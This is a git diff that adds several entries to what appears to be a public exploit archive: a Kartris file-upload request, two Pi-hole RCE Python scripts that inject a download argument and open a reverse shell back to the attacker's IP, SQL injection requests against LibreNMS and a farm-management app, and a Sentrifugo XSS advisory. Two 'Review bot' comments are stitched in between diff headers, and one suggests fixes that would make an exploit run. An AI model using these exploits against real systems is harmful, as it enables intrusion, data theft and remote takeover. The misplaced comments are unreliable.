diff --git a/exploits/aspx/webapps/48445.txt b/exploits/aspx/webapps/48445.txt
new file mode 100644
index 000000000..d5ef619b2
--- /dev/null
+++ b/exploits/aspx/webapps/48445.txt
@@ -0,0 +1,111 @@
+# Exploit Title: Kartris 1.6 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2020-05-08
+# Exploit Author: Nhat Ha - Sun CSR
+# Vendor Homepage: https://www.cactusoft.com/
+# Software Link: https://www.kartris.com/
+# Version: 1.6
+# Category: Webapps
+# Tested on: WiN10_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: https://localhost/Admin/_GeneralFiles.aspx
+#
+POST /Admin/_GeneralFiles.aspx HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
+Firefox/76.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------9604487443072642880454762058
+Content-Length: 18484
+Origin: 192.168.1.1
+Connection: close
+Referer: https://192.168.1.1/Admin/_GeneralFiles.aspx
+Cookie: __cfduid=d1e56d596943226c869a1186e06b8d8661588757096;
+ASP.NET_SessionId=abbnm4jh04wmdbl2gukr5t5w;
+KartrisBasket870c8=s=7i7lpj21819; KartrisBackAuth870c8=xxxxxxxxxxxxx
+Upgrade-Insecure-Requests: 1
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="scrManager_HiddenField"
+
+;;AjaxControlToolkit, Version=4.1.7.123, Culture=neutral,
+PublicKeyToken=28f01b0e84b6d53e:en-GB:57898466-f347-4e5c-9527-24f201596811:475a4ef5:5546a2b:d2e10b12:effe2a26:37e2e5c9:1d3ed089:751cdd15:dfad98a5:497ef277:a43b07eb:3cf12cf1;
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data;
+name="_UC_CategoryMenu_tvwCategory_ExpandState"
+
+cccccccccc
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data;
+name="_UC_CategoryMenu_tvwCategory_SelectedNode"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data;
+name="_UC_CategoryMenu_tvwCategory_PopulateLog"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$scrManager"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$_UC_AdminSearch$txtSearch"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$phdMain$hidFileNameToDelete"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$phdMain$filUploader";
+filename="malicious.aspx"
+Content-Type: text/plain
+
+[Content Malicious File Here ! ]
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$splMainPage$hdnWidth"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$splMainPage$hdnMinWidth"
+
+170px
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$splMainPage$hdnMaxWidth"
+
+500px
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__EVENTTARGET"
+
+ctl00$phdMain$lnkUpload
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__EVENTARGUMENT"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+e7mz4HjQ0AEu2oVGr99HokgmHrtNlEBdbc12UCNvf2ecqRUmHfMSRA/o+piDRnkK+JKX42guSLqv4H9AAyfxyGHXy9Fp+YNNlTkKJKZOr9IEDBQM4j8rg8z1mY+Qb07KMfjXb3Kb3eWY9h1gbNfMp4FfrUwQ8+VK6PsePv/PlUGVxO5ATLid4hQrm0fx05VPLdFkZgXBN+LuVist3AgQ70Vwg7OKplisMzMZ4711SJ8zG9jUIqzEJ3uF96bgeX4kNBqURJdAsj7uKIY8JyWAmMXNNb5++Pkhvskrz+yLK9oSi3tYaJC0gF2aaOEc5LQ8pIsyhyRgu1DZeSitAZLnv757cJDtQbzdu7dbLH4U5fACFJ27xz1v5WyMATh/aWEy+hsN6dyPsciVilaFqpVIEFDD7ZRtLZ6G6EtSuudqc2bDfmh1RfdgtLQ3GWvWl7xKw0SgZypnrjDH4cb3MPbg+iDHaMkhmXiAsf0iTiZPGQT5B683rILYwqd5KQa2zyBmGN+UFeTw2FBmmmZhtKtzZPDGQGH6oFTt5dMdqPOY51Db7DYVsP1MevbMmtHO8u+i7lwqeMnx24uWrAkxoflbTMn7NWxVtHHGqiHvAluibF3MzKl7NMAvlL0fkqbp1Oa+yqxU8Eb81jkClc2DhVAqz1Jijz7wBdJBmu6YlgCx3jkrvFynwIPPDdnq8/4+rLAxzg1VJcrJgjsVR6kJquXxT/VdotOrecDgJJjF5SJ8lx+zqa98Fk6/jLpCKv8PMKXP22zqpkIJBuLeRMBghxRDUXz9ifreEC5krJqeZ45lWchfRqXAzAU6fBanYwDn3RksQ72Op0lOV9HyJS4Jcqv+JsD/yUw3lByEAoWg97QsQA65CJGvL49B8Ht6cl0sh80mXhXaDCEEiFEUdDnePFjQN3ZNBf7PVBvjXZ4zuI/KV5sfFHfBj8qdTM9wndVOCjqrFHF4i39GQqwYfij3i0a3W3wm7Tx7W1Yg/5wiUzyp5BPR0mpAdYgiUcx6CcHSwCgRR0dVRL8W7P6OqbSxoOaNkqkdQe0jPCU/muWd5X+7VknR0EvDecbPISQ0ZfwPgQfQIFKzz5VrFWGxUyV02teMa4R06qmGLGJbhLUk+2b327VKz4vOaTsb707bS6BcqFXfYa+h/sp3ABZ7JRpzoO0huWgZoquQ4HIl4lOaJ116o+T+6ReFWWAadkYb54j2mTGTv2NuR57RmUSBGVdKqIsnOpPmCFaBP89McSKQNgddy169evwP6h3iUWD9apVvrncVBEkZ6mIbnPYasVjlytKkDhiEKVCiXfm6D/KxH1FCqC5KtM4PcpcCZqxdliiL61Q+EGTMORN5NiRBHUjNjnjg+/5A58Z57UONK/MuUZpxjcn4d0tS6eRp+jBZAmAC3vslNxC1tLWkmerB+gBVsiQYPpP+Keawsx4z/Dd+yqJZBOP5kxSxkItcBYxDL1yYZR6aYOqdRUHB2ZH91OZxLFLXWg8AcCmvHV/0SOjfsXZq8P+Q1yv2MUutBjiN36gEZgjRjdNVpO86zK1MCVLO1XQia1uSzjJAr5TbZjmSRiYcsJiRnvmXpAwdJYPjOXKu0s+9Y/9sH94WvLaoI51DwH91rRMt+4EMCImWZwyfIOJxiJeBuMjOwrmsFNA3VzElpvOeqG82jbu2MFZfsD17AXbJHnPlGeOTkDgngZIHrJLDjo9p7930AE9Cg0bw9hvAcrUe4r9bEHaz5JIgwrsAGqGTcbjzheyaeODjxw12BJpIUt0aPxi/LZR7JtvNBkym1RedH8ewfeDcVPqlWFdO5rJ+wABeuFFVIkW6zdc4xM24bYX3gq5mNL3wVT3CoDatZFbZz2CgJB9ZDDa3f0CrWGK7hdTDQ4vF1OUaJB+JZMiKg5H6Ro+JoSK8UI3WcVkStgNA0SMHT2ujLMwDmOeNsdvhQ3OOnoFvZTFsFQI4D6LrZ5GHrIlQTZPyVQrwc19854TfhinQeVbPET2G2pp
kjllnYBelPcCUQ2TdPNL7eW+BkGga391OiDAaHBV25tIkKT4iIoVPYfY2h+PmvU5wxGB+i4MXZaMNCLlv4/gI/FXekKbLTCWkp0lslul4QRHHHVcrbTJVnKme2UyhgTqWpA6JvxyKPzmrogcGZ7+5pHf5gFwhgKj/POURU8Z4QqbUfNNuO1lnyfgH0Wy4ho0WQoJ6VFpT2gqvOSok64UYnF3qiNgdTfP3k6BzGbrG/zQtjtgYCRjeNRsLPeoyRg9UbO6aigmfYSD6PrDKsI5bjl2ceJsAnmCFpiaqxaSVflwzUSvZA5FNyotg/pHlH165sKxR+wQPFyr8HDmE9qiMsRoU3xJz6k+XT1CEMpf0x6TVWDMoC/Ddo/zjA3wxpedwutGubsn1757KgZ+V9McXa3c0LvCW6UkIiax+czNOaG5mu7KAgwgwpHoRz9n0Bg6Di30dQlsT1yYsw4uEqLmdYkaF1LtFNl8gRPibgd/iBlq1fYXGUtCrMA8wMxQh9Z9VCFi0crq2Wi4xvOlyO+eC7Mzh12nMsUyTX0x7DkTj7F3rGNX7pRbq03ellq+XhDNmgmbLggVoGnPSYbTLyjFzZcW+iJci8xXN2ps6rhaq4ETgXuj92RtPiEpIh5TaAB2jAjobflwugihC+2AsSxyVyRHNsB999mGS6C5FrGfkk/1tV/xFS9dK8TQ7IDPECykq1hjnzvVjv4i7NJJ/2RoXCSjOMYWeO0ayJes5Ra1NMYm0NlAJWUSlqA3xQWtdC//n1Nfm6HkRm/h2zLHQZ7T/+xIGuuE9lLp21KLXNXXVDGB8rf+qgRxpUOb8B3vnrZwkOEFD2q29sfo9PwIetVBKoiELaSD61JIYmyjV2omPw89r0VTuEnGOzztf71U1UAZqgY6qD0xFRjIZa1hzxljEmWNsRQlxl7ys4AMKd3lDCbzESzcpzw9bX9uC5BOtZwMKOh9XwOuv6PPxUZXRzOYkbALq51ft3nTgQvFqs/NNPuLlL8JRlfOB0CRNrs93LXbEb69DUtiBtgYVnn3dCxl8ok6TJkIwfnsYDfluyGQtvlHk9GMdwUZbTXHBf6FmJ5+0nnp434HwA0Q4RMBmqb1xXVBCP2+ZU9O0qigIeBivgzgatxw3qi6bSMt/Fn6zPrgHeFDisttaETZ3DyW9FfE75RHBOOS+qjTLunUwwu/ApwgjjBOgwtF6v9JcZh380H6jnXKXt99VEhceSazy3grAesIb3P39XVvt7NQEojdlO8GYTHi8Hko7rnwaSjhw2avvwmLlZGGo6imld3Jt7+Qu03d13oFZOuGOuOlG+JzRMdbSj+Hjd8Jz9RolOOrEKPaiFnWF4n/yxIQRnzZKAQcwpboyTE0kDki0/raVRAR9mIgf9g6AVOdeQM6tGOQ5v1m6oAyIhgA69/m3KiTZZ90GVUaaR7pmtrSxX+zZaHILXVlvnK3GZJEBoIVuwkbfskcK/fLG4IOUaHHX4MOoJZ0lYijPamlUMIwkD/bcomrOX4Og26rzgGui8kFFNkRYq8q59lhsXDasbUOOspBQNKfnKQRa0FQEWOHmEtdGmQ3IKiIHXWrlitE3UHHww0RlWqDrCIoQ9mchQ4KK40vFj3sj39bG5MsoWxE4aqCgTtkjAPLbnUameCQXDm7t19fbqjd1tqsQPo6H61AWO+sEcH1avdS7mV9DSsbRXvcb7onkQKC14AUrEngCITIP9J5Gn+OAT6cNxttnjk3zlmWWnNnloo6q8rrB34f/WTdgq+P9hLQQdraiSfnEd4WWfDf98LYAQknYIX93paZh3scf7z5C1fkfhdIEIWnLXdmAeJKC5nQMaLkgFGhlcZ8NBD8PUqZ4S1Xlii1otppvVsUGobV5Tip8Jw2Sm4JyFlB3oiA9VPdhsAisRRtVo+cplwyyqLLv9mnr5qtqdueAA72lUExI75H8wkd1BWrvSQdwDKTCMEAXwDebTHNlEADWPzSI/Cxjyb7h//QqdPJ/Yt8
T+DcvUY1jPeth6tgKtY6Gz3UdqwoPNVqs0+EL2QqPaGWN+tXKAjxXKZhT3MdLRHUkjsk5sItPzR1iO++3UCYsXM8tbZQEXDx8bTos+33AZfIvHaqRWgQX9l3ZTeqbWOYkp8DPkfRfC9urTwEnYz2SjOrKihI5v7FNyk5bTBEfHYYqV4cyCDVRafFXh6HLlE4WXGHofEhew89WVnNcs3EwuruvDf5JKeczEk0yHM+RuLMTIF9S8e3aAENPscM/pqD4J/PgccRriGsyzCNlGJB7+ZtOfPqWTMwPuO/ut+uhxNqZEUozmWfg++DrddTAY7D2+toFsGfE+f4tw2uCb+p+prkTHpZ866ApH6XvFOP8DYI3oGJ00g532SeTLUF5S/ChdlfH37BYlvuQkiWxf1D9sMHTokbhHZaqdIosPCLf2FSHZ+ODvqKZ+zUpvHijLtPGSLkZmWVNO625cefzLh2nAD/YTApDLLvh2T7m+wVMXlPp17HC3q6CjO05//k= +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" + +54DD7DF0 +-----------------------------9604487443072642880454762058 +Content-Disposition: form-data; name="__VIEWSTATEENCRYPTED" + + +-----------------------------9604487443072642880454762058-- + + +# Access malicious file following the link: +https://localhost/uploads/General/malicious.aspx +# How to fix: Update the latest version +# Commit fix: +https://github.com/cactusoft/kartris/commit/e9450dc1f90aa6167f1db1a6f137ea07cacb2a5c \ No newline at end of file diff --git a/exploits/linux/webapps/48442.py b/exploits/linux/webapps/48442.py new file mode 100755 index 000000000..e6bad5469 --- /dev/null +++ b/exploits/linux/webapps/48442.py 
@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+
+# Pi-hole <= 4.4 RCE
+# Author: Nick Frichette
+# Homepage: https://frichetten.com
+#
+# Note: This exploit must be run with root privileges and port 80 must not be occupied.
+# While it is possible to exploit this from a non standard port, for the sake of
+# simplicity (and not having to modify the payload) please run it with sudo privileges.
+# Or setup socat and route it through there?
+
+import requests
+import sys
+import socket
+import _thread
+import time
+
+if len(sys.argv) < 4:
+ print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port* *(Optional) root*")
+ print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.")
+ exit()
+
+SESSION = dict(PHPSESSID=sys.argv[1])
+TARGET_IP = sys.argv[2]
+LOCAL_IP = sys.argv[3]
+LOCAL_PORT = sys.argv[4]
+
+if len(sys.argv) == 6:
+ ROOT = True
+
+# Surpress https verify warnings
+# I'm asuming some instances will use self-signed certs
+requests.packages.urllib3.disable_warnings()
+
+# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
+payload = """
+""" %(LOCAL_IP, LOCAL_PORT)
+
+def send_response(thread_name):
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.bind((LOCAL_IP,int(80)))
+ sock.listen(5)
+
+ connected = False
+ while not connected:
+ conn,addr = sock.accept()
+ if thread_name == "T1":
+ print("[+] Received First Callback")
+ conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
+ else:
+ print("[+] Received Second Callback")
+ print("[+] Uploading Payload")
+ conn.sendall(bytes(payload, "utf-8"))
+ conn.close()
+ connected = True
+
+ sock.close()
+
+_thread.start_new_thread(send_response,("T1",))
+
+
+# Fetch token
+resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
+response = str(resp.content)
+token_loc = response.find("name=\"token\"")
+token = response[token_loc+20:token_loc+64]
+
+
+# Make request with token
+data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
+resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
+if resp.status_code == 200:
+ print("[+] Put Stager Success")
+
+
+# Update gravity
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+
+time.sleep(3)
+_thread.start_new_thread(send_response,("T2",))
+
+
+# Update again to trigger upload
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+print("[+] Triggering Exploit")
+try:
+ requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False)
+except:
+ # We should be silent to avoid filling the cli window
+ None
\ No newline at end of file
diff --git a/exploits/linux/webapps/48443.py b/exploits/linux/webapps/48443.py
new file mode 100755
index 000000000..51f4dc944
--- /dev/null
+++ b/exploits/linux/webapps/48443.py
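Review bot: The argument check `if len(sys.argv) < 4:` does not cover `LOCAL_PORT = sys.argv[4]`, so invoking the script with four arguments raises an IndexError instead of printing the usage text that itself says five parameters are required; `if len(sys.argv) < 5:` matches the usage string. The `ROOT = True` assignment for a sixth argument is never read anywhere in the file, so either that flag or the `*(Optional) root*` entry in the usage line is dead. The same `< 4` check against a required `sys.argv[4]` appears in exploits/linux/webapps/48443.py. As a point of style, the bare `except:` whose body is the expression `None` would read more clearly as `except requests.exceptions.RequestException: pass`, which keeps the intended silence without masking unrelated errors.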
@@ -0,0 +1,119 @@
+#!/usr/bin/env python3
+
+# Pi-hole <= 4.4 RCE
+# Author: Nick Frichette
+# Homepage: https://frichetten.com
+#
+# Note: This exploit must be run with root privileges and port 80 must not be occupied.
+# While it is possible to exploit this from a non standard port, for the sake of
+# simplicity (and not having to modify the payload) please run it with sudo privileges.
+# Or setup socat and route it through there?
+
+import requests
+import sys
+import socket
+import _thread
+import time
+
+if len(sys.argv) < 4:
+ print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port*")
+ print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.")
+ exit()
+
+SESSION = dict(PHPSESSID=sys.argv[1])
+TARGET_IP = sys.argv[2]
+LOCAL_IP = sys.argv[3]
+LOCAL_PORT = sys.argv[4]
+
+# Surpress https verify warnings
+# I'm asuming some instances will use self-signed certs
+requests.packages.urllib3.disable_warnings()
+
+# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
+shell_payload = """
+""" %(LOCAL_IP, LOCAL_PORT)
+
+root_payload = """
+"""
+
+def send_response(thread_name):
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.bind((LOCAL_IP,int(80)))
+ sock.listen(5)
+
+ connected = False
+ while not connected:
+ conn,addr = sock.accept()
+ if thread_name == "T1":
+ print("[+] Received First Callback")
+ conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
+ elif thread_name == "T2":
+ print("[+] Received Second Callback")
+ print("[+] Uploading Root Payload")
+ conn.sendall(bytes(root_payload, "utf-8"))
+ elif thread_name == "T3":
+ print("[+] Received Third Callback")
+ conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
+ else:
+ print("[+] Received Fourth Callback")
+ print("[+] Uploading Shell Payload")
+ conn.sendall(bytes(shell_payload, "utf-8"))
+ conn.close()
+ connected = True
+
+ sock.close()
+
+_thread.start_new_thread(send_response,("T1",))
+
+
+# Fetch token
+resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
+response = str(resp.content)
+token_loc = response.find("name=\"token\"")
+token = response[token_loc+20:token_loc+64]
+
+
+# Make request with token
+data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
+resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
+if resp.status_code == 200:
+ print("[+] Put Root Stager Success")
+
+
+# Update gravity
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+time.sleep(3)
+_thread.start_new_thread(send_response,("T2",))
+
+
+# Update again to trigger upload of root redirect
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+time.sleep(1)
+_thread.start_new_thread(send_response,("T3",))
+
+data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o teleporter.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
+resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
+if resp.status_code == 200:
+ print("[+] Put Shell Stager Success")
+
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+time.sleep(1)
+_thread.start_new_thread(send_response,("T4",))
+
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+
+print("[+] Triggering Exploit")
+try:
+ requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False)
+except:
+ # We should be silent to avoid filling the cli window
+ None
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48453.txt b/exploits/multiple/webapps/48453.txt
new file mode 100644
index 000000000..f9b61877b
--- /dev/null
+++ b/exploits/multiple/webapps/48453.txt
@@ -0,0 +1,55 @@
+# Exploit Title: LibreNMS 1.46 - 'search' SQL Injection
+# Google Dork:unknown
+# Date: 2019-09-01
+# Exploit Author: Punt
+# Vendor Homepage: https://www.librenms.org
+# Software Link: https://www.librenms.org
+# Version:1.46 and less
+# Tested on:Linux and Windows
+# CVE: N/A
+
+#Affected Device: more than 4k found on Shodan and Censys.
+
+#Description about the bug
+Vunlerable script /html/ajax_serarch.php
+
+if (isset($_REQUEST['search'])) {
+ $search = mres($_REQUEST['search']);
+ header('Content-type: application/json');
+ if (strlen($search) > 0) {
+ $found = 0;
+
+ if ($_REQUEST['type'] == 'group') {
+ include_once '../includes/device-groups.inc.php';
+ foreach (dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'") as $group) {
+ if ($_REQUEST['map']) {
+ $results[] = array(
+ 'name' => 'g:'.$group['name'],
+ 'group_id' => $group['id'],
+
+
+as you can there is a search parameter $search = mres($_REQUEST['search']); which accepts a user input using $_REQUEST['']
+
+dbFetchRows() used to exectute sql query
+
+now lets check the mres() function
+
+the mres() fuction is located under /includes/common.php
+
+function mres($string)
+{
+ return $string; //
+ global $database_link;
+ return mysqli_real_escape_string($database_link, $string);
+
+as you can see the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%'
+
+
+#POC:
+1st lgoin to your LibreNMS
+2nd go to this /ajax_search.php?search=%27&type=group or /ajax_search.php?search=%27&type=alert-rules
+3rd you will see an sql syntax error
+
+The Librenms team have applyed a patch .
+Thanks
+Punt (From Ethiopia)
\ No newline at end of file
diff --git a/exploits/php/webapps/48244.txt b/exploits/php/webapps/48244.txt
index 9edd4d31c..7122bec86 100644
--- a/exploits/php/webapps/48244.txt
+++ b/exploits/php/webapps/48244.txt
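Review bot: The explanation of mres() in this file contradicts the code it quotes: the function body begins with `return $string; //`, so the `mysqli_real_escape_string()` call on the following lines is unreachable and the input is returned unescaped. The sentence `as you can see the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%'` should instead say that the early return makes mres() a no-op, which is why the quote character in the PoC reaches the query string unchanged. The durable remediation is a parameterised query rather than restoring the escape call, since the value is interpolated into a LIKE pattern. The typos `Vunlerable`, `ajax_serarch.php`, `exectute`, `fuction`, `lgoin` and `applyed` could be corrected in the same pass.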
@@ -6,7 +6,7 @@ # Software Link: https://en.ulicms.de/current_versions.html # Version: 2020.1 # Tested on: Windows -# CVE : N/A +# CVE : CVE-2020-12704 ### Vulnerability : Stored Cross-Site Scripting diff --git a/exploits/php/webapps/48250.txt b/exploits/php/webapps/48250.txt index 01f7d3944..44d905674 100644 --- a/exploits/php/webapps/48250.txt +++ b/exploits/php/webapps/48250.txt @@ -7,7 +7,7 @@ https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php # Version: 4.5.0 # Tested on: Windows -# CVE : N/A +# CVE : CVE-2020-12707 ### Vulnerability : Persistent Cross-Site Scripting diff --git a/exploits/php/webapps/48404.txt b/exploits/php/webapps/48404.txt index 36428e78b..54a6f9ee3 100644 --- a/exploits/php/webapps/48404.txt +++ b/exploits/php/webapps/48404.txt @@ -6,7 +6,7 @@ # Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30 # Version: 9.03.50 # Tested on: Windows -# CVE : N/A +# CVE : CVE-2020-12706 ### Vulnerability : Persistent Cross-Site Scripting diff --git a/exploits/php/webapps/48444.txt b/exploits/php/webapps/48444.txt new file mode 100644 index 000000000..358753c78 --- /dev/null +++ b/exploits/php/webapps/48444.txt 
@@ -0,0 +1,48 @@ +# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection +# Date: 2020-05-06 +# Exploit Author: Tarun Sehgal +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/farm_management_system_in_php_with_source_code.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +--------------------------------------------------------------------------------- + +#parameter Vulnerable: uname +# Injected Request +#Below request will print database name and MariaDB version. + +POST /fms/Login/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 204 +Origin: http://localhost +Connection: close +Referer: http://localhost/fms/index.php +Cookie: PHPSESSID=fiiiu7pq9kvhdr770ahd7dejco +Upgrade-Insecure-Requests: 1 + +uname=admin' OR (SELECT 1935 FROM(SELECT COUNT(*),CONCAT(database(),(SELECT (ELT(1935=1935,1))),0x3a,version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dqgD&pass=admin&category=1 + + + +----------------------------------------------------------------------------------------------------------------------------- +#Response +HTTP/1.1 302 Found +Date: Wed, 06 May 2020 13:21:36 GMT +Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.5 +X-Powered-By: PHP/7.4.5 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +location: error.php +Content-Length: 356 +Connection: close +Content-Type: text/html; charset=UTF-8 + + +Warning: mysqli_query(): (23000/1062): Duplicate entry 'agroculture1:10.4.11-MariaDB1' for key 'group_key' in \ No newline at end 
of file diff --git a/exploits/php/webapps/48446.txt b/exploits/php/webapps/48446.txt new file mode 100644 index 000000000..4483f8ccf --- /dev/null +++ b/exploits/php/webapps/48446.txt 
@@ -0,0 +1,148 @@
+# Exploit Title: Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting
+# Dork: N/A
+# Date: 2020-05-06
+# Exploit Author: Vulnerability-Lab
+# Vendor: http://www.sentrifugo.com/
+# Link: http://www.sentrifugo.com/download
+# Version: 3.2
+# Category: Webapps
+# CVE: N/A
+
+Document Title:
+===============
+Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2229
+
+
+Product & Service Introduction:
+===============================
+http://www.sentrifugo.com/
+http://www.sentrifugo.com/download
+
+
+Affected Product(s):
+====================
+Sentrifugo
+Product: Sentrifugo v3.2 - CMS (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-05: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official Mahara v19.10.2 CMS web-application series.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser
+to web-application requests from the application-side.
+
+The persistent vulnerability is located in the `expense_name` parameters
+of the `/expenses/expenses/edit` module in the `index.php` file.
+Remote attackers with low privileges are able to inject own malicious
+persistent script code as expenses entry. The injected code can
+be used to attack the frontend or backend of the web-application. The
+request method to inject is POST and the attack vector is located
+on the application-side. Entries of expenses can be reviewed in the
+backend by higher privileged accounts as well.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] index.php/expenses/expenses/edit
+
+Vulnerable Input(s):
+[+] Expenses Name
+
+Vulnerable File(s):
+[+] index.php
+
+Vulnerable Parameter(s):
+[+] expense_name
+
+Affected Module(s):
+[+] index.php/expenses/expenses
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by low privileged web
+application user account with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+PoC: Vulnerable Source
+
+
+
+
+
+
+--- PoC Session Logs [POST] --- (Expenses Inject)
+http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
+Host: sentrifugo.localhost:8080
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 352
+Origin: http://sentrifugo.localhost:8080
+Connection: keep-alive
+Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
+Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87;
+_ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443
+id=&limit=&offset=¶meter=all¤cyid=1&file_original_names=&file_new_names=&last_inserted_receipts=&receiptId=&expense_Id=&
+expense_name=&category_id=&project_id=&expense_date=&expense_currency_id=2&
+expense_amount=&cal_amount=0&is_from_advance=&expense_payment_id=&expense_payment_ref_no=&trip_id=&description=&post_receipt_ids=&submit=Save
+-
+POST: HTTP/1.1 200 OK
+Server: Apache/2.2.22 (Ubuntu)
+X-Powered-By: PHP/5.3.10-1ubuntu3.10
+Vary: Accept-Encoding
+Content-Encoding: gzip
+Content-Length: 19284
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+
+
+Reference(s):
+http://sentrifugo.localhost:8080/index.php
+http://sentrifugo.localhost:8080/index.php/expenses
